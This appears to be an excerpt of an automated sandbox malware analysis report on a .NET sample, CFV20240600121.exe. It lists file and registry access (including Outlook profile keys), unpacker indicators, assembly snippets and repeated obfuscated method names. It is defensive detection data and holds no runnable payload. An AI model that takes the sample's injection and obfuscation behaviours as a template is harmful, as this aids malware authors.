            Source: C:\Users\user\Desktop\CFV20240600121.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: CFV20240600121.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: CFV20240600121.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: write.pdbGCTL source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308515930.000000000087E000.00000002.00000001.01000000.0000000D.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451569346.000000000087E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CFV20240600121.exe, CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: CFV20240600121.exe, OnelookerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: BPSHhDGmARC.exe.0.dr, OnelookerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.7990000.6.raw.unpack, LoginForm.cs.Net Code: _200F_202B_200C_202E_206F_202B_206C_200F_206E_202B_200F_200B_206C_200D_200E_200B_206C_206F_200C_206B_206A_206E_202A_206C_206C_206B_202E_202A_206D_206C_206D_206D_206F_200B_202A_206C_200C_206E_202D_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.41d9970.4.raw.unpack, LoginForm.cs.Net Code: _200F_202B_200C_202E_206F_202B_206C_200F_206E_202B_200F_200B_206C_200D_200E_200B_206C_206F_200C_206B_206A_206E_202A_206C_206C_206B_202E_202A_206D_206C_206D_206D_206F_200B_202A_206C_200C_206E_202D_200D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.cs.Net Code: Yr4ZhY7ma0ZV4nWo6Pb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.cs.Net Code: Yr4ZhY7ma0ZV4nWo6Pb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.cs.Net Code: Yr4ZhY7ma0ZV4nWo6Pb System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_05809040 pushad ; retf 0_2_0580904E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D864B push eax; retf 0_2_077D8651
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077DBD0A push es; ret 0_2_077DBDB0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_00403350 push eax; ret 12_2_00403352
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_00401CCB push 0000006Bh; iretd 12_2_00401D84
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_00401CD0 push 0000006Bh; iretd 12_2_00401D84
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040C4B4 push cs; retf 002Ah12_2_0040C4B8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040851A push cs; retf 12_2_0040851D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040853C push 00000009h; retf 12_2_0040853E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_00413623 pushad ; ret 12_2_0041364E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_00417F3D pushfd ; retf 12_2_00417F3F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013A225F pushad ; ret 12_2_013A27F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013A27FA pushad ; ret 12_2_013A27F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D09AD push ecx; mov dword ptr [esp], ecx12_2_013D09B6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013A283D push eax; iretd 12_2_013A2858
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729864B push eax; retf 13_2_07298651
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119C54D pushfd ; ret 18_2_0119C54E
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119C54F push 8B011267h; ret 18_2_0119C554
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011509AD push ecx; mov dword ptr [esp], ecx18_2_011509B6
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119C9D7 push edi; ret 18_2_0119C9D9
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01121366 push eax; iretd 18_2_01121369
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01121FEC push eax; iretd 18_2_01121FED
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011A7E99 push ecx; ret 18_2_011A7EAC
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0042CDC5 pushfd ; iretd 18_2_0042CDC8
            Source: CFV20240600121.exeStatic PE information: section name: .text entropy: 7.968738777305981
            Source: BPSHhDGmARC.exe.0.drStatic PE information: section name: .text entropy: 7.968738777305981
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, rcAhwe0SsoaRMDCYH3.csHigh entropy of concatenated method names: 'CctDrJ5R5B', 'PMqDv53J1c', 'HEDDbVPkff', 'Es7D8Bn8oq', 'oYoDTYpuG4', 'oOZDyywI1s', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, Q1osC4jmDQ2af4b3Lb.csHigh entropy of concatenated method names: 'Dispose', 'UMCq00ngp4', 'cSH6vnKO06', 'tuZUUdovei', 'C6jqgJynyI', 'DeRqzTUUhr', 'ProcessDialogKey', 'gQY6kcAhwe', 'Xso6qaRMDC', 'sH366oeNvF'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, fqVeyh45HIxqT0pjXt.csHigh entropy of concatenated method names: 'Xx1ZopUqA0', 'e5IZnLLEf3', 'WucebI3ZVM', 'BBfe8owtMJ', 'y5PeyJeDJU', 'wbReCvKVWo', 'EWDeVfoiAQ', 'xgceiOJN4t', 'ayXeHCyuOq', 'BAweN788rN'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, B59IJEeG458FnpCpLw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Yid60omFHs', 'G4M6gDf7C4', 'qWj6zvOC1Y', 'HTlAkA3dn5', 'BtTAq1bfqA', 'NAYA6Ej18H', 'uKxAAioITW', 'adCuQa7TxrukqJN7sVe'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cjJynySIGeRTUUhrjQ.csHigh entropy of concatenated method names: 'jbPDFpUwVs', 'CtLDjjbOsC', 'L9eDeDb1lh', 'bSIDZwRPCE', 'FumDBUgsLp', 'EUjDPQhxlT', 'qIQDLfn5CO', 'g9HD2HtOV9', 'E6yDfOOt8F', 'HNoD5c2vvM'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, ddYYkTVAHJQd1uYqnX.csHigh entropy of concatenated method names: 'BK1PF4QIo8', 'ldfPeHIVRL', 'dWtPBlPKqa', 'tkjBgcNQWL', 'gI5BzkFyuQ', 'rmMPkmf679', 'Eb7PqmMCnD', 'Yi3P6RNChe', 'xkUPAuwgia', 'dViPaRWLsG'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, rMfhWf6caF37Nf6dTo.csHigh entropy of concatenated method names: 'R86E4Sc5J', 'MTI7y9pPP', 'CSChsGdJb', 'yLNnWaJF2', 'P3nl9vVss', 'JUP4TOrK2', 'DIjOyjnF7hTRrFCUNt', 'uOLbRmRXIm1NxZeMmV', 'vK5DaxUdx', 'to09A1fSK'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, vTUORdGgKEO15QVN9b.csHigh entropy of concatenated method names: 'dlgjTdSZrY', 'wEZjdKC3el', 'XiDjtkpuQW', 'wQYjINsgWx', 'irCjJMweHT', 'tvcjUB00Sg', 'nT6jOP4o1F', 'AaKjSMX0K9', 'GjIj0hZ1wd', 'U9xjgpp5DM'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, BeNvFlg3NwH4r19Ux0.csHigh entropy of concatenated method names: 'NHlYqIWQon', 'eUIYAuNkS7', 'iKfYa4uOuN', 'bfFYFgnfen', 'r1hYjWMn79', 'EXeYZGhG6n', 'I2nYBafPlr', 'scFDOCWbEJ', 'KBcDSGadK2', 'jFrD0v0qjZ'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, B7O31U1ax1wA0a2ntc.csHigh entropy of concatenated method names: 'UiNwGuO7ge', 'q1EwlsNYMR', 'rqbwrlduPQ', 'b0Jwvk3v7b', 'tJvw8DiEp4', 'kRAwyTMqqZ', 'SfuwVgnuOc', 'N3pwil333Z', 'xaHwNO3iEc', 'rFMwmJM8th'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, QswHnVqAwTdG1wOapNc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UiJ9TjgJOG', 't0L9dWSJxQ', 'OKu9ta2376', 'jVP9IZfiva', 'm3P9JHuGlV', 'BHO9Us94Rq', 'DdN9OmeOYc'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, UG267rt0AW47N5B3Sh.csHigh entropy of concatenated method names: 'ToString', 'xqPsmgv8ER', 'Qgnsv9FdKS', 'MiXsb2Nx7B', 'c7Ts8Y6u59', 'eSqsyBNXfK', 'BL2sC2vR4r', 'cPRsVWLXLV', 'QTMsiBFOIm', 'KT1sH3Q8BW'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, acgVYqHy8LriRQWHvj.csHigh entropy of concatenated method names: 'gM3PcL6eie', 'BaNPR71FEv', 'YUPPE0SJ6E', 'rWoP7xAKX0', 'pQGPoeF29C', 'H86PhpyB0c', 'l6oPn7tGIW', 'hARPGpsTSO', 'GhRPlGIfEi', 'fvmP4RoaRV'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, p88wMsUacQZe0Nacfw.csHigh entropy of concatenated method names: 'Pg5XSHK4kI', 'V90XgWYv7D', 'zoeDkseqZm', 'Ht3DqIdeyU', 'ioPXm8nA5r', 'm47XMQh3rw', 'vrPX1YHmJN', 'KuwXTeuy3N', 't56XduPZdr', 'Y92XtGE9uM'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.csHigh entropy of concatenated method names: 'RuDAWUsu0r', 'T3XAFuBn6x', 'k0sAjosAft', 'pySAefe8X2', 'EMCAZI9rOQ', 'Sw6AB5tm5A', 'OpHAPxKWWN', 'ixDALh6onY', 'RwmA2vbUdB', 'M5vAfVbPB1'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, A086JuqkHgM0AKgA1Rg.csHigh entropy of concatenated method names: 'WC3Yc16FLT', 'FMyYRGsZk9', 'PeEYEeuots', 'TfFY79ZMRG', 'VGhYoZWbne', 'UPuYhnlZBY', 'SHZYnkbZfK', 'MvvYGdTP4E', 'CsmYlQrdkV', 'pxsY4J4lvJ'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, rITaQNIppjHIGN5wLX.csHigh entropy of concatenated method names: 'zorXfxXv3R', 'iWuX5N8ruh', 'ToString', 'IvbXFooyFm', 'jOKXjnYRy6', 'NBGXelLUL4', 'JpdXZpHLTb', 'YHOXBbI1T0', 'BTPXPG7NLI', 'DoDXLVYOJj'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, mN32LvabmXpXZxWsh7.csHigh entropy of concatenated method names: 'UOQqPTUORd', 'YKEqLO15QV', 'jNLqfa0i2E', 'hgaq5RFqVe', 'XpjquXtV3h', 'kP6qslewCE', 'khgoSnk2sBccMk9jLb', 'YPGr9WVdpN8jr3lc8I', 'aRuqq1S90B', 'unqqASLMNK'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, K3hLP6rlewCE5KBKWX.csHigh entropy of concatenated method names: 'KjJBWRtwp8', 'fcfBjWgrSJ', 'PgiBZsiSkr', 'ojuBP0uXcf', 'nIQBL1LmkG', 'F1hZJM91AY', 'nGDZUGHhWD', 'DZ6ZOKmQVv', 'AonZSwRYX1', 'K7DZ0Z9GIn'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, pXQelPlNLa0i2EegaR.csHigh entropy of concatenated method names: 'ASRe75lZsE', 'nY5ehTexdG', 'pDceGX5NFI', 'wvtelUZQZV', 'l6deutdvvh', 'EFaes7Iutd', 'UiNeXx7fjL', 'XLgeDC8sht', 'E80eYV5Y2D', 'Qgye9oI49G'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, ouWeMMzRTqcDURfed2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pd7YwnqBAE', 'JGPYuFryfk', 'S3iYsHffjk', 'nkOYXyefiq', 'hPFYDg9XSo', 'KekYYP2f7v', 'I7TY9HyN5x'
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, nOMy4evii8BZVFqpjP.csHigh entropy of concatenated method names: 'dtJn1dqdpfDOHmhqJIT', 'Ou9ruxqAIpKEGus1uSY', 'l0SBD8w3sh', 'yvnBYPcalo', 'xcVB9VxdAm', 'xv1xoHqhKg3MjJSRNBC', 'PpeQXoq2SyC69ePMpZ5'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, rcAhwe0SsoaRMDCYH3.csHigh entropy of concatenated method names: 'CctDrJ5R5B', 'PMqDv53J1c', 'HEDDbVPkff', 'Es7D8Bn8oq', 'oYoDTYpuG4', 'oOZDyywI1s', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, Q1osC4jmDQ2af4b3Lb.csHigh entropy of concatenated method names: 'Dispose', 'UMCq00ngp4', 'cSH6vnKO06', 'tuZUUdovei', 'C6jqgJynyI', 'DeRqzTUUhr', 'ProcessDialogKey', 'gQY6kcAhwe', 'Xso6qaRMDC', 'sH366oeNvF'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, fqVeyh45HIxqT0pjXt.csHigh entropy of concatenated method names: 'Xx1ZopUqA0', 'e5IZnLLEf3', 'WucebI3ZVM', 'BBfe8owtMJ', 'y5PeyJeDJU', 'wbReCvKVWo', 'EWDeVfoiAQ', 'xgceiOJN4t', 'ayXeHCyuOq', 'BAweN788rN'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, B59IJEeG458FnpCpLw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Yid60omFHs', 'G4M6gDf7C4', 'qWj6zvOC1Y', 'HTlAkA3dn5', 'BtTAq1bfqA', 'NAYA6Ej18H', 'uKxAAioITW', 'adCuQa7TxrukqJN7sVe'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cjJynySIGeRTUUhrjQ.csHigh entropy of concatenated method names: 'jbPDFpUwVs', 'CtLDjjbOsC', 'L9eDeDb1lh', 'bSIDZwRPCE', 'FumDBUgsLp', 'EUjDPQhxlT', 'qIQDLfn5CO', 'g9HD2HtOV9', 'E6yDfOOt8F', 'HNoD5c2vvM'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, ddYYkTVAHJQd1uYqnX.csHigh entropy of concatenated method names: 'BK1PF4QIo8', 'ldfPeHIVRL', 'dWtPBlPKqa', 'tkjBgcNQWL', 'gI5BzkFyuQ', 'rmMPkmf679', 'Eb7PqmMCnD', 'Yi3P6RNChe', 'xkUPAuwgia', 'dViPaRWLsG'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, rMfhWf6caF37Nf6dTo.csHigh entropy of concatenated method names: 'R86E4Sc5J', 'MTI7y9pPP', 'CSChsGdJb', 'yLNnWaJF2', 'P3nl9vVss', 'JUP4TOrK2', 'DIjOyjnF7hTRrFCUNt', 'uOLbRmRXIm1NxZeMmV', 'vK5DaxUdx', 'to09A1fSK'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, vTUORdGgKEO15QVN9b.csHigh entropy of concatenated method names: 'dlgjTdSZrY', 'wEZjdKC3el', 'XiDjtkpuQW', 'wQYjINsgWx', 'irCjJMweHT', 'tvcjUB00Sg', 'nT6jOP4o1F', 'AaKjSMX0K9', 'GjIj0hZ1wd', 'U9xjgpp5DM'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, BeNvFlg3NwH4r19Ux0.csHigh entropy of concatenated method names: 'NHlYqIWQon', 'eUIYAuNkS7', 'iKfYa4uOuN', 'bfFYFgnfen', 'r1hYjWMn79', 'EXeYZGhG6n', 'I2nYBafPlr', 'scFDOCWbEJ', 'KBcDSGadK2', 'jFrD0v0qjZ'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, B7O31U1ax1wA0a2ntc.csHigh entropy of concatenated method names: 'UiNwGuO7ge', 'q1EwlsNYMR', 'rqbwrlduPQ', 'b0Jwvk3v7b', 'tJvw8DiEp4', 'kRAwyTMqqZ', 'SfuwVgnuOc', 'N3pwil333Z', 'xaHwNO3iEc', 'rFMwmJM8th'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, QswHnVqAwTdG1wOapNc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UiJ9TjgJOG', 't0L9dWSJxQ', 'OKu9ta2376', 'jVP9IZfiva', 'm3P9JHuGlV', 'BHO9Us94Rq', 'DdN9OmeOYc'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, UG267rt0AW47N5B3Sh.csHigh entropy of concatenated method names: 'ToString', 'xqPsmgv8ER', 'Qgnsv9FdKS', 'MiXsb2Nx7B', 'c7Ts8Y6u59', 'eSqsyBNXfK', 'BL2sC2vR4r', 'cPRsVWLXLV', 'QTMsiBFOIm', 'KT1sH3Q8BW'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, acgVYqHy8LriRQWHvj.csHigh entropy of concatenated method names: 'gM3PcL6eie', 'BaNPR71FEv', 'YUPPE0SJ6E', 'rWoP7xAKX0', 'pQGPoeF29C', 'H86PhpyB0c', 'l6oPn7tGIW', 'hARPGpsTSO', 'GhRPlGIfEi', 'fvmP4RoaRV'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, p88wMsUacQZe0Nacfw.csHigh entropy of concatenated method names: 'Pg5XSHK4kI', 'V90XgWYv7D', 'zoeDkseqZm', 'Ht3DqIdeyU', 'ioPXm8nA5r', 'm47XMQh3rw', 'vrPX1YHmJN', 'KuwXTeuy3N', 't56XduPZdr', 'Y92XtGE9uM'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.csHigh entropy of concatenated method names: 'RuDAWUsu0r', 'T3XAFuBn6x', 'k0sAjosAft', 'pySAefe8X2', 'EMCAZI9rOQ', 'Sw6AB5tm5A', 'OpHAPxKWWN', 'ixDALh6onY', 'RwmA2vbUdB', 'M5vAfVbPB1'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, A086JuqkHgM0AKgA1Rg.csHigh entropy of concatenated method names: 'WC3Yc16FLT', 'FMyYRGsZk9', 'PeEYEeuots', 'TfFY79ZMRG', 'VGhYoZWbne', 'UPuYhnlZBY', 'SHZYnkbZfK', 'MvvYGdTP4E', 'CsmYlQrdkV', 'pxsY4J4lvJ'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, rITaQNIppjHIGN5wLX.csHigh entropy of concatenated method names: 'zorXfxXv3R', 'iWuX5N8ruh', 'ToString', 'IvbXFooyFm', 'jOKXjnYRy6', 'NBGXelLUL4', 'JpdXZpHLTb', 'YHOXBbI1T0', 'BTPXPG7NLI', 'DoDXLVYOJj'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, mN32LvabmXpXZxWsh7.csHigh entropy of concatenated method names: 'UOQqPTUORd', 'YKEqLO15QV', 'jNLqfa0i2E', 'hgaq5RFqVe', 'XpjquXtV3h', 'kP6qslewCE', 'khgoSnk2sBccMk9jLb', 'YPGr9WVdpN8jr3lc8I', 'aRuqq1S90B', 'unqqASLMNK'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, K3hLP6rlewCE5KBKWX.csHigh entropy of concatenated method names: 'KjJBWRtwp8', 'fcfBjWgrSJ', 'PgiBZsiSkr', 'ojuBP0uXcf', 'nIQBL1LmkG', 'F1hZJM91AY', 'nGDZUGHhWD', 'DZ6ZOKmQVv', 'AonZSwRYX1', 'K7DZ0Z9GIn'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, pXQelPlNLa0i2EegaR.csHigh entropy of concatenated method names: 'ASRe75lZsE', 'nY5ehTexdG', 'pDceGX5NFI', 'wvtelUZQZV', 'l6deutdvvh', 'EFaes7Iutd', 'UiNeXx7fjL', 'XLgeDC8sht', 'E80eYV5Y2D', 'Qgye9oI49G'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, ouWeMMzRTqcDURfed2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pd7YwnqBAE', 'JGPYuFryfk', 'S3iYsHffjk', 'nkOYXyefiq', 'hPFYDg9XSo', 'KekYYP2f7v', 'I7TY9HyN5x'
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, nOMy4evii8BZVFqpjP.csHigh entropy of concatenated method names: 'dtJn1dqdpfDOHmhqJIT', 'Ou9ruxqAIpKEGus1uSY', 'l0SBD8w3sh', 'yvnBYPcalo', 'xcVB9VxdAm', 'xv1xoHqhKg3MjJSRNBC', 'PpeQXoq2SyC69ePMpZ5'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, rcAhwe0SsoaRMDCYH3.csHigh entropy of concatenated method names: 'CctDrJ5R5B', 'PMqDv53J1c', 'HEDDbVPkff', 'Es7D8Bn8oq', 'oYoDTYpuG4', 'oOZDyywI1s', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, Q1osC4jmDQ2af4b3Lb.csHigh entropy of concatenated method names: 'Dispose', 'UMCq00ngp4', 'cSH6vnKO06', 'tuZUUdovei', 'C6jqgJynyI', 'DeRqzTUUhr', 'ProcessDialogKey', 'gQY6kcAhwe', 'Xso6qaRMDC', 'sH366oeNvF'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, fqVeyh45HIxqT0pjXt.csHigh entropy of concatenated method names: 'Xx1ZopUqA0', 'e5IZnLLEf3', 'WucebI3ZVM', 'BBfe8owtMJ', 'y5PeyJeDJU', 'wbReCvKVWo', 'EWDeVfoiAQ', 'xgceiOJN4t', 'ayXeHCyuOq', 'BAweN788rN'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, B59IJEeG458FnpCpLw.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Yid60omFHs', 'G4M6gDf7C4', 'qWj6zvOC1Y', 'HTlAkA3dn5', 'BtTAq1bfqA', 'NAYA6Ej18H', 'uKxAAioITW', 'adCuQa7TxrukqJN7sVe'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cjJynySIGeRTUUhrjQ.csHigh entropy of concatenated method names: 'jbPDFpUwVs', 'CtLDjjbOsC', 'L9eDeDb1lh', 'bSIDZwRPCE', 'FumDBUgsLp', 'EUjDPQhxlT', 'qIQDLfn5CO', 'g9HD2HtOV9', 'E6yDfOOt8F', 'HNoD5c2vvM'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, ddYYkTVAHJQd1uYqnX.csHigh entropy of concatenated method names: 'BK1PF4QIo8', 'ldfPeHIVRL', 'dWtPBlPKqa', 'tkjBgcNQWL', 'gI5BzkFyuQ', 'rmMPkmf679', 'Eb7PqmMCnD', 'Yi3P6RNChe', 'xkUPAuwgia', 'dViPaRWLsG'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, rMfhWf6caF37Nf6dTo.csHigh entropy of concatenated method names: 'R86E4Sc5J', 'MTI7y9pPP', 'CSChsGdJb', 'yLNnWaJF2', 'P3nl9vVss', 'JUP4TOrK2', 'DIjOyjnF7hTRrFCUNt', 'uOLbRmRXIm1NxZeMmV', 'vK5DaxUdx', 'to09A1fSK'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, vTUORdGgKEO15QVN9b.csHigh entropy of concatenated method names: 'dlgjTdSZrY', 'wEZjdKC3el', 'XiDjtkpuQW', 'wQYjINsgWx', 'irCjJMweHT', 'tvcjUB00Sg', 'nT6jOP4o1F', 'AaKjSMX0K9', 'GjIj0hZ1wd', 'U9xjgpp5DM'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, BeNvFlg3NwH4r19Ux0.csHigh entropy of concatenated method names: 'NHlYqIWQon', 'eUIYAuNkS7', 'iKfYa4uOuN', 'bfFYFgnfen', 'r1hYjWMn79', 'EXeYZGhG6n', 'I2nYBafPlr', 'scFDOCWbEJ', 'KBcDSGadK2', 'jFrD0v0qjZ'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, B7O31U1ax1wA0a2ntc.csHigh entropy of concatenated method names: 'UiNwGuO7ge', 'q1EwlsNYMR', 'rqbwrlduPQ', 'b0Jwvk3v7b', 'tJvw8DiEp4', 'kRAwyTMqqZ', 'SfuwVgnuOc', 'N3pwil333Z', 'xaHwNO3iEc', 'rFMwmJM8th'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, QswHnVqAwTdG1wOapNc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UiJ9TjgJOG', 't0L9dWSJxQ', 'OKu9ta2376', 'jVP9IZfiva', 'm3P9JHuGlV', 'BHO9Us94Rq', 'DdN9OmeOYc'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, UG267rt0AW47N5B3Sh.csHigh entropy of concatenated method names: 'ToString', 'xqPsmgv8ER', 'Qgnsv9FdKS', 'MiXsb2Nx7B', 'c7Ts8Y6u59', 'eSqsyBNXfK', 'BL2sC2vR4r', 'cPRsVWLXLV', 'QTMsiBFOIm', 'KT1sH3Q8BW'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, acgVYqHy8LriRQWHvj.csHigh entropy of concatenated method names: 'gM3PcL6eie', 'BaNPR71FEv', 'YUPPE0SJ6E', 'rWoP7xAKX0', 'pQGPoeF29C', 'H86PhpyB0c', 'l6oPn7tGIW', 'hARPGpsTSO', 'GhRPlGIfEi', 'fvmP4RoaRV'
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, p88wMsUacQZe0Nacfw.csHigh entropy of concatenated method names: 'Pg5XSHK4kI', 'V90XgWYv7D', 'zoeDkseqZm', 'Ht3DqIdeyU', 'ioPXm8nA5r', 'm47XMQh3rw', 'vrPX1YHmJN', 'KuwXTeuy3N', 't56XduPZdr', 'Y92XtGE9uM'
